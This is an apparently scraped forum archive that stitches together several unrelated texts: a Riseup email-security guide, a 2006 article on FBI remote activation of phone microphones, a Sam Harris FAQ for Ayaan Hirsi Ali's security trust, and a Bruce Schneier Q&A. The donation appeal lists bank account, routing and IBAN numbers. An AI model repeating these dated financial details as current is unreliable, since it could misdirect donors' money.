URL bar and adding the ‘s’ and then hit to load the page securely.

The third way to tell is by looking for a little padlock icon. It will
either appear in the URL location bar, or in the bottom corner of the
window, it should appear locked, if the lock doesn’t exist, or the
lock picture looks like it is unlocked, you are not using a secure
connection. You can hover your mouse over the padlock to get more
information, and often clicking (or sometimes right-clicking) on the
lock will bring up details about the SSL certificate used to secure
the connection.

If you click on the padlock, you can verify Riseup’s certificate
fingerprints, this is a very good idea! Follow these directions to
verify our fingerprint.

When using a mail client (Thunderbird, Outlook, etc.)
For POP and IMAP, your mail client will have the option of enabling
SSL or TLS. For sending mail (SMTP), both SSL and TLS will work, but
some ISPs will block TLS, so you might need to use SSL. For more
specific, step-by-step configurations for your mail client, see our
mail client tutorials and SMTP FAQ.

The limits of secure connections

The problem with email is that takes a long and perilous journey. When
you send a message, it first travels from your computer to the mail server and then is delivered to the recipient’s mail
server. Finally, the recipient logs on to check their email and the
message is delivered to their computer.

Using secure connections only protects your data as it travels from
your computer to the the servers (and vice versa). It does
not make your email any more secure as it travels around the internet
from mail server to mail server. To do this, see below.

Use secure email providers
What is StartTLS?

There are many governments and corporations who “sniff” general
traffic on the internet. Even if you use a secure connection to check
and send your email, the communication between mail servers is almost
always insecure and out in the open.

Fortunately, there is a solution! StartTLS is a fancy name for a very
important idea: StartTLS allows mail servers to talk to each other in
a secure way.

If you and your friends use only email providers which use StartTLS,
then all the mail traffic among you will be encrypted while in
transport. If both sender and recipient also use secure connections
while talking to the mail servers, then your communications are likely
secure over its entire lifetime.

We will repeat that because it is important: to gain any benefit from
StartTLS, both sender and recipient must be using StartTLS enabled
email providers. For mailing lists, the list provider and each and
every list subscriber must use StartTLS.

Which email providers use StartTLS?
Currently, these tech collectives are known to use StartTLS:


We recommend that you and all your friends get email accounts with
these tech collectives!
Additionally, these email providers often have StartTLS enabled:

* universities:,,,,,,,,,,,,,,,,,,,
* organizations:,
* companies:,,,,,,,,, greennet (

What are the advantages of StartTLS?
This combination of secure email providers and secure connections has
many advantages:

* It is very easy to use! No special software is needed. No
special behavior is needed, other than to make sure you are using
secure connections.
* It prevents anyone from creating a map of whom you are
communicating with and who is communicating with you (so long as both
parties use StartTLS).
* It ensures that your communication is pretty well protected.
* It promotes the alternative mail providers which use StartTLS.
The goal is to create a healthy ecology of activist providers–which
can only happen if people show these providers strong support. Many of
these alternative providers also also incorporate many other important
security measures such as limited logging and encrypted storage.

What are the limitations of StartTLS?
However, there are some notable limitations:

* Your computer is a weak link: your computer can be stolen,
hacked into, have keylogging software or hardware installed.
* It is difficult to verify: for a particular message to be
secure, both the origin and destination mail providers must use
StartTLS (and both the sender and recipient must use encrypted
connections). Unfortunately, it is difficult to confirm that all of
this happened. For this, you need public key encryption (see below).

Use public-key encryption
If you wish to keep the contents of your email private, and confirm
the identity of people who send you email, you should download and
install public-key encryption software. This option is only available
if you have your own computer.

Public-key encryption uses a combination of a private key and a public
key. The private key is known only by you, while the public key is
distributed far and wide. To send an encrypted message to someone, you
encrypt the message with their public key. Only their private key will
be able to decrypt your message and read it.

The universal standard for public-key encryption is Pretty Good
Privacy (PGP) and GNU Privacy Guard (GPG). GPG is Free Software, while
PGP is a proprietary product (although there are many freeware
versions available). Both work interchangeably and are available as
convenient add-ons to mail clients for Linux, Mac, and Windows.

For information configuring your mail client to use public key
encryption, see our mail client tutorial pages. In particular, see the
tutorials for Apple Mail and Thunderbird. Otherwise, you should refer
the to documentation which comes with your particular mail client.

Although it provides the highest level of security, public-key
encryption is still an adventure to use. To make your journey less
scary, we suggest you keep these things in mind:

* Be in it for the long haul: using public-key encryption takes a
commitment to learning a lot of new skills and jargon. The widespread
adoption of GPG is a long way off, so it may seem like a lot of work
for not much benefit. However, we need early adopters who can help
build a critical mass of GPG users.
* Develop GPG buddies: although most your traffic might not be
encrypted, if you find someone else who uses GPG try to make a
practice of communicating using only GPG with that person.
* Look for advocates: people who use GPG usually love to
evangelize about it and help others to use it to. Find someone like
this who can answer your questions and help you along.

Although you can hide the contents of email with public-key
encryption, it does not hide who you are sending mail to and receiving
mail from. This means that even with public key encryption there is a
lot of personal information which is not secure.

Why? Imagine that someone knew nothing of the content of your mail
correspondence, but they knew who you sent mail to and received mail
from and they knew how often and what the subject line was. This
information can provide a picture of your associations, habits,
contacts, interests and activities.

The only way to keep your list of associations private is to to use an
email provider which will establish a secure connection with other
email providers. See Use secure email providers, above.

What are certificates?

On the internet, a public key certificate is needed in order to verify
the identity of people or computers. These certificates are also
called SSL certificates or identity certificates. We will just call
them “certificates.”

In particular, certificates are needed to establish secure
connections. Without certificates, you would be able to ensure that no
one else was listening, but you might be talking to the wrong computer
altogether! All servers and all services allow
or require secure connections. It can sometimes be tricky to coax a
particular program to play nice and recognize the
certificates. This page will help you through the process.

If you don’t follow these steps, your computer will likely complain or
fail every time you attempt to create a secure connection with

What is a certificate authority?
Certificates are the digital equivalent of a government issued
identification card. Certificates, however, are issued by private
corporations called certificate authorities (CA).

I thought you were against authority?
We are, but the internet is designed to require certificate
authorities and there is not much we can do about it. There are other
models for encrypted communication, such as the decentralized notion
of a “web of trust” found in PGP. Unfortunately, no one has written
any web browsers or mail clients to use PGP for establishing secure
connections, so we are forced to rely on certificate authorities. Some
day, we hope to collaborate with other tech collectives to create a
certificate (anti) authority.

Your certificate is not recognized – what should I do?
We recently installed new certificates that should solve this issue
for webmail and mail client users. However, users accessing the secure
pages for,, and will still receive this annoying error message. The
problem is that these servers use a CA Cert root certificate, which is
not on the list of “trusted” certification authorities. So, in order
to use the certificates without receiving the error message, you will
need to import the CA Cert Root Certificate.

What are the fingerprints of’s certificates?
Some programs cannot use certificate authorities to confirm the
validity of a certificate. In that case, you may need to manually
confirm the fingerprint of the certificate. Here are some
fingerprints for various certificates:

Hash: SHA1

1. SSL fingerprint for
* sha1: BA:73:F5:45:E0:98:54:E5:6D:BA:5C:4B:98:EF:1A:A9:4B:C1:47:9D
* md5:  88:12:94:4D:D5:43:FE:22:84:4E:67:C9:0C:1E:DC:DA

2. SSL fingerprint for
* sha1: F2:1D:DC:23:89:36:15:F9:1B:2C:66:F0:93:99:6E:C8:EB:2C:43:BB
* md5:  A1:3E:38:19:39:70:DA:F0:0E:B1:58:D9:1A:67:41:AD

3. SSL fingerprint for
* sha1: 13:C8:86:19:53:52:C7:A1:B8:03:B0:53:1A:E9:DA:FF:AD:A9:BB:24
* md5:  84:32:84:43:81:13:16:56:0F:CE:68:A9:CF:29:4D:8D
Version: GnuPG v1.4.6 (GNU/Linux)


When should I verify these fingerprints?
You should verify these fingerprints whenever they change, or you are
using a computer that you do not control (such as at an internet cafe,
or a library). Verify them if you are suspicious, be suspicious and
learn how to verify them and do it often.

How do I verify these fingerprints?
To verify these fingerprints, you need to look at what your browser
believes the fingerprints are for the certificates and compare them to
what is listed above. If they are different, there is a problem.

In most browsers, the way you look at the fingerprints of the
certificate that you were given is by clicking on the lock icon that
is located either in the URL location bar, or in the bottom corner of
your browser. This should bring up details about the certificate being
used, including the fingerprint. Some browsers may only show the MD5
fingerprint, or the SHA1 fingerprint, some will show both. Usually one
is good enough to verify the validity of the fingerprint.

I want to learn more

Great, this is an important topic and we encourage you to read this
piece which clearly articulates in a non-technical way the problems
involved in certificate authorities as well as outlining some
interesting suggestions for ways that the existing architecture and
protocols can be tweaked just a little bit to change the situation for
the better.


Policy at
We strive to keep our mail as secure and private as we can.

* We do not log your IP address. (Most services keep detailed
records of every machine which connects to the servers. We keep only
information which cannot be used to uniquely identify your machine.)
* All your data, including your mail, is stored by in
encrypted form.
* We work hard to keep our servers secure and well defended
against any malicious attack.
* We do not share any of our user data with anyone.
* We will actively fight any attempt to subpoena or otherwise
acquire any user information or logs.
* We will not read, search, or process any of your incoming or
outgoing mail other than by automatic means to protect you from
viruses and spam or when directed to do so by you when



Security resources for activists

This site contains a quick overview of email security. For more in-
depth information, check out these websites:
Helping activists stay safe in our oppressive world.
A series of briefings on information security and online safety for
civil society organizations.
Guide to Email Security Using Encryption and Digital Signatures
Computer Security for the Average Activist
An introduction to activism on the internet


FBI taps cell phone mic as eavesdropping tool
BY Anne Broache and Declan McCullagh  /  December 1, 2006

The FBI appears to have begun using a novel form of electronic
surveillance in criminal investigations: remotely activating a mobile
phone’s microphone and using it to eavesdrop on nearby conversations.

The technique is called a “roving bug,” and was approved by top U.S.
Department of Justice officials for use against members of a New York
organized crime family who were wary of conventional surveillance
techniques such as tailing a suspect or wiretapping him.

Nextel cell phones owned by two alleged mobsters, John Ardito and his
attorney Peter Peluso, were used by the FBI to listen in on nearby
conversations. The FBI views Ardito as one of the most powerful men in
the Genovese family, a major part of the national Mafia.

The surveillance technique came to light in an opinion published this
week by U.S. District Judge Lewis Kaplan. He ruled that the “roving
bug” was legal because federal wiretapping law is broad enough to
permit eavesdropping even of conversations that take place near a
suspect’s cell phone.

Kaplan’s opinion said that the eavesdropping technique “functioned
whether the phone was powered on or off.” Some handsets can’t be fully
powered down without removing the battery; for instance, some Nokia
models will wake up when turned off if an alarm is set. While the
Genovese crime family prosecution appears to be the first time a
remote-eavesdropping mechanism has been used in a criminal case, the
technique has been discussed in security circles for years.

The U.S. Commerce Department’s security office warns that “a cellular
telephone can be turned into a microphone and transmitter for the
purpose of listening to conversations in the vicinity of the phone.”
An article in the Financial Times last year said mobile providers can
“remotely install a piece of software on to any handset, without the
owner’s knowledge, which will activate the microphone even when its
owner is not making a call.”

Nextel and Samsung handsets and the Motorola Razr are especially
vulnerable to software downloads that activate their microphones, said
James Atkinson, a counter-surveillance consultant who has worked
closely with government agencies. “They can be remotely accessed and
made to transmit room audio all the time,” he said. “You can do that
without having physical access to the phone.”

Because modern handsets are miniature computers, downloaded software
could modify the usual interface that always displays when a call is
in progress. The spyware could then place a call to the FBI and
activate the microphone–all without the owner knowing it happened.
(The FBI declined to comment on Friday.) “If a phone has in fact been
modified to act as a bug, the only way to counteract that is to either
have a bugsweeper follow you around 24-7, which is not practical, or
to peel the battery off the phone,” Atkinson said. Security-conscious
corporate executives routinely remove the batteries from their cell
phones, he added.

FBI’s physical bugs discovered

The FBI’s Joint Organized Crime Task Force, which includes members of
the New York police department, had little luck with conventional
surveillance of the Genovese family. They did have a confidential
source who reported the suspects met at restaurants including Brunello
Trattoria in New Rochelle, N.Y., which the FBI then bugged.

But in July 2003, Ardito and his crew discovered bugs in three
restaurants, and the FBI quietly removed the rest. Conversations
recounted in FBI affidavits show the men were also highly suspicious
of being tailed by police and avoided conversations on cell phones
whenever possible.

That led the FBI to resort to “roving bugs,” first of Ardito’s Nextel
handset and then of Peluso’s. U.S. District Judge Barbara Jones
approved them in a series of orders in 2003 and 2004, and said she
expected to “be advised of the locations” of the suspects when their
conversations were recorded.

Details of how the Nextel bugs worked are sketchy. Court documents,
including an affidavit (p1) and (p2) prepared by Assistant U.S.
Attorney Jonathan Kolodner in September 2003, refer to them as a
“listening device placed in the cellular telephone.” That phrase could
refer to software or hardware.

One private investigator interviewed by CNET, Skipp Porteous
of Sherlock Investigations in New York, said he believed the FBI
planted a physical bug somewhere in the Nextel handset and did not
remotely activate the microphone. “They had to have physical
possession of the phone to do it,” Porteous said. “There are several
ways that they could have gotten physical possession. Then they
monitored the bug from fairly near by.”

But other experts thought microphone activation is the more likely
scenario, mostly because the battery in a tiny bug would not have
lasted a year and because court documents say the bug works anywhere
“within the United States”–in other words, outside the range of a
nearby FBI agent armed with a radio receiver.

In addition, a paranoid Mafioso likely would be suspicious of any ploy
to get him to hand over a cell phone so a bug could be planted. And
Kolodner’s affidavit seeking a court order lists Ardito’s phone
number, his 15-digit International Mobile Subscriber Identifier, and
lists Nextel Communications as the service provider, all of which
would be unnecessary if a physical bug were being planted.

A BBC article from 2004 reported that intelligence agencies routinely
employ the remote-activiation method. “A mobile sitting on the desk of
a politician or businessman can act as a powerful, undetectable bug,”
the article said, “enabling them to be activated at a later date to
pick up sounds even when the receiver is down.”

For its part, Nextel said through spokesman Travis Sowders: “We’re not
aware of this investigation, and we weren’t asked to participate.”
Other mobile providers were reluctant to talk about this kind of
surveillance. Verizon Wireless said only that it “works closely with
law enforcement and public safety officials. When presented with
legally authorized orders, we assist law enforcement in every way
possible.” A Motorola representative said that “your best source in
this case would be the FBI itself.” Cingular, T-Mobile, and the CTIA
trade association did not immediately respond to requests for comment.

Mobsters: The surveillance vanguard

This isn’t the first time the federal government has pushed at the
limits of electronic surveillance when investigating reputed mobsters.
In one case involving Nicodemo S. Scarfo, the alleged mastermind of a
loan shark operation in New Jersey, the FBI found itself thwarted when
Scarfo used Pretty Good Privacy software (PGP) to encode confidential
business data. So with a judge’s approval, FBI agents repeatedly snuck
into Scarfo’s business to plant a keystroke logger and monitor its

Like Ardito’s lawyers, Scarfo’s defense attorneys argued that the then-
novel technique was not legal and that the information gleaned through
it could not be used. Also like Ardito, Scarfo’s lawyers lost when a
judge ruled in January 2002 that the evidence was admissible. This
week, Judge Kaplan in the southern district of New York concluded that
the “roving bugs” were legally permitted to capture hundreds of hours
of conversations because the FBI had obtained a court order and
alternatives probably wouldn’t work.

The FBI’s “applications made a sufficient case for electronic
surveillance,” Kaplan wrote. “They indicated that alternative methods
of investigation either had failed or were unlikely to produce
results, in part because the subjects deliberately avoided government

Bill Stollhans, president of the Private Investigators Association of
Virginia, said such a technique would be legally reserved for police
armed with court orders, not private investigators. There is “no law
that would allow me as a private investigator to use that type of
technique,” he said. “That is exclusively for law enforcement. It is
not allowable or not legal in the private sector. No client of mine
can ask me to overhear telephone or strictly oral conversations.”

Surreptitious activation of built-in microphones by the FBI has been
done before. A 2003 lawsuit revealed that the FBI was able to
surreptitiously turn on the built-in microphones in automotive systems
like General Motors’ OnStar to snoop on passengers’ conversations.
When FBI agents remotely activated the system and were listening in,
passengers in the vehicle could not tell that their conversations were
being monitored.

Malicious hackers have followed suit. A report last year said Spanish
authorities had detained a man who write a Trojan horse that secretly
activated a computer’s video camera and forwarded him the recordings.

From the archive, originally posted by: [ spectre ]


I CAN THINK OF A FEW OTHER PEOPLE THIS COULD WORK FOR,scholarID.117,type.1/pub_list.asp,filter.all/scholar.asp

“An outspoken defender of women’s rights in Islamic societies, Ms.
Hirsi Ali was born in Mogadishu, Somalia. She escaped an arranged
marriage by immigrating to the Netherlands in 1992, and served as a
member of the Dutch parliament from 2003 to 2006. In parliament, she
worked on furthering the integration of non-Western immigrants into
Dutch society, and on defending the rights of women in Dutch muslim
society. In 2004, together with director Theo van Gogh, she made
Submission, a film about the oppression of women in conservative
Islamic cultures. The airing of the film on Dutch television resulted
in the assassination of van Gogh by an Islamic extremist.  At AEI, Ms.
Hirsi Ali will be researching the relationship between the West and
Islam; women’s rights in Islam; violence against women propagated by
religious and cultural arguments; and Islam in Europe.”


Frequently Asked Questions about the Ayaan Hirsi Ali Security Trust
Answered by Sam Harris

1. As a bestselling author, can’t Ayaan Hirsi Ali afford to pay for
her own protection?

For security reasons, I cannot give specific information about the
arrangements that have been made for Ayaan Hirsi Ali, but I can say
that the average security costs for people with similar security
profiles can be in excess of two million dollars per year. Needless to
say, very few writers sell enough books to cover such an extraordinary
expense (and Ayaan Hirsi Ali is not among them).

This might seem like an outrageous sum to spend so that one woman can
safely stand at a university lectern and speak about the power of
reason and the rights of little girls–and it is an outrageous sum and
an outrageous circumstance. It is, of course, galling that a mere
advocate of human rights and basic rationality should require special
protection in the United States. But this is simply a fact of life in
a world where freedom of speech and conscience falls ever more under
the shadow of Muslim fanaticism. In my opinion, there is no one making
a more heroic effort to change this fact than Ayaan Hirsi Ali.

2. In your original appeal, you wrote that “if every reader of this
email simply pledged ten dollars a month to protect Ayaan Hirsi Ali,
the costs of her security would be covered for as long as the threat
to her life remains.” How can you say this if you don’t know how far
the email has spread? And if you only need $10 from each person why
does the security page have options to give as much as $1000 per

The idea of offering a monthly subscription was to allow everyone to
make a meaningful contribution to Ms. Hirsi Ali’s protection. Given
what I know about the general costs of security, and the fact that the
original email went out to over 15,000 people, it was correct to say
that Ms. Hirsi Ali’s needs would be largely met if everyone gave $10 a
month indefinitely. However, the truth is that only about half of the
people receiving the email will open it; fewer will read it; and fewer
still will donate.

I would be extremely happy if we could meet Ms. Hirsi Ali’s security
needs in a grassroots way, with small donations, but this is not
realistic. Protecting her will require some much larger gifts of
money. Such gifts are still needed and actively being sought.

3. Aren’t there more important causes to support than the protection
of Ayaan Hirsi Ali?

There are countless worthy targets for our generosity. Whether it is
helping to alleviate hunger in the developing world or building a new
pediatric hospital in the United States, one must choose between
absolute need and absolute need, and such choices often defy rational

Allow me to briefly make the case, however, that in this wilderness of
competing needs and limited resources, the ongoing protection of Ayaan
Hirsi Ali deserves our special commitment. In fact, few projects
represent such a perfect marriage of moral and intellectual necessity.
While the threat of Muslim extremism still seems distant to many of us
living in the developed world, I think it is the one problem that has
the potential to suddenly eclipse all others.

When one considers the cascading effects of what 19 jihadists did with
box-cutters on September 11th, 2001–now measured in the trillions of
dollars–it is difficult to imagine how the world might look after a
single incident of nuclear terrorism. I think it is safe to say,
however, that if we do suffer even one such attack, global warming
will seem the least of our concerns. For this reason, I think that the
superstition and bigotry that currently plagues Muslim communities,
East and West, is the most pressing issue of our time. I know of no
person better placed to awaken the world to the scope of this growing
emergency than Ayaan Hirsi Ali.

4. Might this just be a waste of money? Do bodyguards actually make a

Anyone who doubts the effectiveness of professional security should
remember that Ms. Hirsi Ali’s colleague, Theo van Gogh, having
declined diplomatic protection of his own, was immediately murdered on
an Amsterdam street. It is true that no security can be perfect,
especially when one’s enemies are willing to commit suicide. But the
fact that U.S. diplomats successfully travel to places like Kabul and
Baghdad demonstrates that the combination of intelligence, secrecy,
and armed protection can make a difference. It is safe to say that Ms.
Hirsi Ali is only alive today because the Dutch gave her diplomatic
protection the moment she started receiving death threats in 2002.

5. Isn’t it true that the Dutch would still protect Ayaan Hirsi Ali if
she remained in Holland?

The Dutch government has said as much. But the offer does not seem to
be in good faith. The threat to Ms. Hirsi Ali is actually greatest in
Holland, and it is much more expensive to protect her there. In fact,
the security precautions necessary to keep her safe in Holland are
quite stifling. She is much better placed in the U.S. to do her work.
(For more on this subject, please see the opinion piece I wrote with
Salman Rushdie).

6. Why single out Ayaan Hirsi Ali? Don’t other Muslim dissidents need
our support?

There surely are other Muslim dissidents who are threatened and
deserve our support. Ayaan Hirsi Ali is the most visible, however. In
the event we raise enough money for her security, we will help others
as well. Several of us are in the process of forming non-profit
foundations for this larger purpose.

7. What will you do with the money, if you don’t raise enough of it?

The Ayaan Hirsi Ali Security Trust will pay for Ms. Hirsi Ali’s
security until the money runs out. Hopefully we will raise enough to
cover her needs indefinitely. If we do not raise enough money, and no
government steps forward to offer her diplomatic protection, Ms. Hirsi
Ali could be forced to stop doing her work and enter the witness
protection program. Hopefully it will never come to that.

8. What will you do if you raise more money than is needed?

Given the costs of Ms. Hirsi Ali’s security, excess funds are not
expected. However, if we raise enough money to cover Ms. Hirsi Ali’s
security, I will send an announcement by email to every person who has
donated to the Security Trust through this website. This will give
people a choice about whether to continue to give to a surplus fund. I
will, of course, make a similar announcement if Ms. Hirsi Ali is ever
given diplomatic protection by the U.S. government (or any other).

The surplus fund will be used to support other dissidents and public
intellectuals in the Muslim world – through conferences, media events,
publications, or by making similar efforts to pay for their

9. Ayaan Hirsi Ali works for the American Enterprise Institute–a
“neoconservative” think-tank. Why should liberals support her?

Ms. Hirsi Ali’s cause transcends politics and should motivate liberals
and conservatives equally. The American Enterprise Institute, to its
great credit and to the enduring shame of my fellow liberals, was the
only think-tank to offer Ms. Hirsi Ali a job when her security
concerns finally forced her to leave Holland. Even if you find the
views of certain AEI fellows as objectionable as I do, please
recognize that Ayaan Hirsi Ali is an independent scholar. The AEI
deserves credit for having the courage and wisdom to support her.
Donations to the Ayaan Hirsi Ali Security Trust do not go to (or
through) the AEI.

10. How widely is this appeal being circulated? Is this only a secular
effort, or have you reached out to Christians and moderate Muslims as

I’ve reached out to everyone I think could be helpful, including
people like Pastor Rick Warren. I am very happy to say that Pastor
Warren responded immediately (as fast as the fastest atheist) and
pledged to help. I’ve also sent this appeal to my few contacts among
practicing Muslims. Needless to say, I think it would be only fitting
if moderate Muslims helped protect Ayaan Hirsi Ali from the immoderate

11. Is there a risk that a high profile appeal such as this might be
seen as a victory by the extremists who threaten Muslim apostates?

From my point of view, we don’t have the luxury of worrying about
this. I think our society should be devoting immense resources to the
problem of encouraging and protecting dissidents in the Muslim world.
Until governments realize this, private citizens will have to do what
they can. The real victory for the extremists would be if someone like
Ayaan Hirsi Ali could no longer make public appearances and do her

12. Will you personally be giving to the Security Trust every month?


Questions about the Ayaan Hirsi Ali Security Trust can be sent to:
author [at] samharris [dot] org
Please have the subject line read: “Question about the Security Trust”


Thank you for your interest in helping Ayaan Hirsi Ali. If you would
like more information about her, you can find it here:

All contributions made below go directly to the Ayaan Hirsi Ali
Security Trust. This private trust is dedicated to financing Ms. Hirsi
Ali’s security and can accept donations both from within the United
States and internationally.

While one-time donations will be deeply appreciated, please consider
setting up a monthly subscription on your credit card. A monthly
subscription can allow anyone to make a meaningful contribution toward
Ms. Hirsi Ali’s security without incurring great expense up front.

Unfortunately, donations to the Ayaan Hirsi Ali Security Trust are not
tax-deductible, as U.S. law does not currently allow for charitable
contributions to be directed toward a single individual. However, if a
tax-deduction is important to you, a more general charity as been set
up, the Foundation for Freedom of Expression, whose mission is to help
protect Ayaan Hirsi Ali as well as other dissidents in the Muslim
world. Tax Deductable Donations to the foundation may be sent by check
or wire-transfer directly to:

The Foundation for Freedom of Expression, Inc
Bank of Georgetown
1054 31st Street, N.W., Suite 18
Washington, DC 20007
Telephone: 202-355-1200
Account Number: 1010054805
Bank Routing Number: 054001712
Employer Identification Number (EIN): 33-1185369

Monthly Subscription
Use this form to set up a recurring monthly donation.

Payment by Check
Checks should be made payable to the Ayaan Hirsi Ali Security Trust
and sent to:

Ayaan Hirsi Ali Security Trust

Bank of Georgetown
1054 31st Street, N.W.
Suite 18
Washington, DC 20007
Ayaan Hirsi Ali Trust Tax Identification Number: 75-6826872

Wire Transfer from within the U.S.

Account Name: Ayaan Hirsi Ali Security Trust
Account Number: 1010054748
Bank Name: Bank of Georgetown
Bank Address: 1054 31st Street, N.W., Suite 18, Washington, DC 20007
Bank Telephone: 202-355-1200
Bank Routing Number: 054001712

International Wire Transfer

For international wire transfers from outside the U.S. to the bank
accounts of the Ayaan Hirsi Ali Security Trust, you can also wire to
the Netherlands bank account of Dorchester House B.V., which has
dedicated one of their accounts for supporting Security of Ms Hirsi
Ali. All donations and contributions to this account will be forwarded
to the US bank account of the Security Trust and no bank- or other
expenses will be charged. All cash flow is supervised by external
chartered accountants of the Ayaan Hirsi Ali Security Trust.

Donations can be made to:

Dorchester House B.V., Amsterdam
Account number: 4732822 with Postbank NV, Amsterdam
IBAN number: NL61PSTB0004732822
BIC/SWIFT code bank: PSTBNL21 Postbank NV, Amsterdam

Please note however that the USA does not have or use IBAN numbers.
Use the ‘account number’ 1010054748 instead. Also, you will need the
routing number 054001712 (also known as FedWire or ABA). Like most US
financial institutions this (ABA) number is used by the Bank of
Georgetown as their only routing type and the SWIFT/BIC code is NOT


“Eid-Mubarak” : The Holy Quran says: “Ramadan is the (month) in which
was sent down the Holy Quran, as a guide to mankind, also clear
(Signs) for guidance and judgment (Between right and wrong).” (2:185)

From the archive, originally posted by: [ spectre ]


Bruce Schneier Blazes Through Your Questions
By Stephen J. Dubner  /  December 4, 2007

Last week, we solicited your questions for Internet security guru
Bruce Schneier. He responded in force, taking on nearly every
question, and his answers are extraordinarily interesting, providing
mandatory reading for anyone who uses a computer. He also plainly
thinks like an economist: search below for “crime pays” to see his
sober assessment of why it’s better to earn a living as a security
expert than as a computer criminal.

Thanks to Bruce and to all of you for participating. Here’s a note
that Bruce attached at the top of his answers: “Thank you all for your
questions. In many cases, I’ve written longer essays on the topics
you’ve asked about. In those cases, I’ve embedded the links into the
necessarily short answers I’ve given here.”

Q: Assuming we are both still here in 50 years, what do you believe
will be the most incredible, fantastic, mind-blowing advance in
computers/technology at that time?

A: Fifty years is a long time. In 1957, fifty years ago, there were
fewer than 2,000 computers total, and they were essentially used to
crunch numbers. They were huge, expensive, and unreliable; sometimes,
they caught on fire. There was no word processing, no spreadsheets, no
e-mail, and no Internet. Programs were written on punch cards or paper
tape, and memory was measured in thousands of digits. IBM sold a disk
drive that could hold almost 4.5 megabytes, but it was five-and-a-half
feet tall by five feet deep and would just barely fit through a
standard door.

Read the science fiction from back then, and you’d be amazed by what
they got wrong. Sure, they predicted smaller and faster, but no one
got the socialization right. No one predicted eBay, instant messages,
or blogging.

Moore’s Law predicts that in fifty years, computers will be a billion
times more powerful than they are today. I don’t think anyone has any
idea of the fantastic emergent properties you get from a billion-times
increase in computing power. (I recently wrote about what security
would look like in ten years, and that was hard enough.) But I can
guarantee that it will be incredible, fantastic, and mind-blowing.

Q: With regard to identity theft, do you see any alternatives to data
being king? Do you see any alternative systems which will mean that
just knowing enough about someone is not enough to commit a crime?

A: Yes. Identity theft is a problem for two reasons. One, personal
identifying information is incredibly easy to get; and two, personal
identifying information is incredibly easy to use. Most of our
security measures have tried to solve the first problem. Instead, we
need to solve the second problem. As long as it’s easy to impersonate
someone if you have his data, this sort of fraud will continue to be a
major problem.

The basic answer is to stop relying on authenticating the person, and
instead authenticate the transaction. Credit cards are a good example
of this. Credit card companies spend almost no effort authenticating
the person — hardly anyone checks your signature, and you can use your
card over the phone, where they can’t even check if you’re holding the
card — and spend all their effort authenticating the transaction. Of
course it’s more complicated than this; I wrote about it in more
detail here and here.

Q: What’s the next major identity verification system?

A: Identity verification will continue to be the hodge-podge of
systems we have today. You’re recognized by your face when you see
someone you know; by your voice when you talk to someone you know.
Open your wallet, and you’ll see a variety of ID cards that identify
you in various situations — some by name and some anonymously. Your
keys “identify” you as someone allowed in your house, your office,
your car. I don’t see this changing anytime soon, and I don’t think it
should. Distributed identity is much more secure than a single system.
I wrote about this in my critique of REAL ID.

Q: If we can put a man on the moon, why in the world can’t we design a
computer that can “cold boot” nearly instantaneously? I know about
hibernation, etc., but when I do have to reboot, I hate waiting those
three or four minutes.

A: Of course we can; Amiga was a fast booting computer, and OpenBSD
boxes boot in less than a minute. But the current crop of major
operating systems just don’t. This is an economics blog, so you tell
me: why don’t the computer companies compete on boot-speed?

Q: Considering the carelessness with which the government (state and
federal) and commercial enterprises treat our confidential
information, is it essentially a waste of effort for us as individuals
to worry about securing our data?

A: Yes and no. More and more, your data isn’t under your direct
control. Your e-mail is at Google, Hotmail, or your local ISP. Online
merchants like Amazon and eBay have records of what you buy, and what
you choose to look at but not buy. Your credit card company has a
detailed record of where you shop, and your phone company has a
detailed record of who you talk to (your cell phone company also knows
where you are). Add medical databases, government databases, and so
on, and there’s an awful lot of data about you out there. And data
brokers like ChoicePoint and Acxiom collect all of this data and more,
building up a surprisingly detailed picture on all Americans.

As you point out, one problem is that these commercial and government
organizations don’t take good care of our data. It’s an economic
problem: because these parties don’t feel the pain when they lose our
data, they have no incentive to secure it. I wrote about this two
years ago, stating that if we want to fix the problem, we must make
these organizations liable for their data losses. Another problem is
the law; our Fourth Amendment protections protect our data under our
control — which means in our homes, in our cars, and on our computers.
We don’t have nearly the same protection when we give our data to some
other organization for use or safekeeping.

That being said, there’s a lot you can do to secure your own data. I
give a list here.

Q: How do you remember all of your passwords?

A: I can’t. No one can; there are simply too many. But I have a few
strategies. One, I choose the same password for all low-security
applications. There are several Web sites where I pay for access, and
I have the same password for all of them. Two, I write my passwords
down. There’s this rampant myth that you shouldn’t write your
passwords down. My advice is exactly the opposite. We already know how
to secure small bits of paper. Write your passwords down on a small
bit of paper, and put it with all of your other valuable small bits of
paper: in your wallet. And three, I store my passwords in a program I
designed called Password Safe. It’s is a small application — Windows
only, sorry — that encrypts and secures all your passwords.

Here are two other resources: one concerning how to choose secure
passwords (and how quickly passwords can be broken), and one on how
lousy most passwords actually are.

Q: What’s your opinion of the risks of some of the new (and upcoming)
online storage services, such as Google’s GDrive or Microsoft’s Live
Drive? Most home computer users don’t adequately safeguard or backup
their storage, and these services would seem to offer a better-
maintained means of storing files; but what do users risk by storing
that much important information with organizations like Google or

A: Everything I wrote in my answer to the identity theft question
applies here: when you give a third party your data, you have to both
trust that they will protect it adequately, and hope that they won’t
give it all to the government just because the government asks nicely.
But you’re certainly right, data loss is the number one risk for most
home users, and network-based storage is a great solution for that. As
long as you encrypt your data, there’s no risk and only benefit.

Q: Do you think that in the future, everything will go from hard-wired
to wireless? If so, with cell phones, radios, satellites, radar, etc.
using all the airwaves (or spectrum), do you think there is a
potential for, well, messing everything up? What about power outages
and the such?

A: Wireless is certainly the way of the future. From a security
perspective, I don’t see any major additional risks. Sure, there’s a
potential for messing everything up, but there was before. Same with
power outages. Data transmitted wirelessly should probably be
encrypted and authenticated; but it should have been over wires, too.
The real risk is complexity. Complexity is the worst enemy of
security; as systems become more complex, they get less secure. It’s
not the addition of wireless per se; it’s the complexity that wireless
— and everything else — adds.

Q: There has been some work to date on the cost-benefit economics of
security. In your estimation, is this a sound approach to motivate
better security, and do you think it is doomed to begin with since
society disproportionately values other things before it values
security? If so, do you think it’s time for us to take up digital
pitchforks and shine some light on the economic gatekeepers’ personal

A: Security is a trade-off, just like anything else. And it’s not true
that we always disproportionately value other things before security.
Look at our terrorism policies; when we’re scared, we value security
disproportionately before all other things. Looking at security
through the lens of economics (as I did here) is the only way to
understand how these motivations work and what level of security is
optimal for society. Not that I’m discouraging you from picking up
your digital pitchforks. People have an incredibly complex
relationship with security — read my essay on the psychology of
security, and this one on why people are so bad at judging risks — and
the more information they have, the better.

Q: Is there an equilibrium point in which the cost (either financial
or time) of hacking a password becomes more expensive than the value
of the data? If so what is it?

A: Of course, but there are too many variables to answer the question.
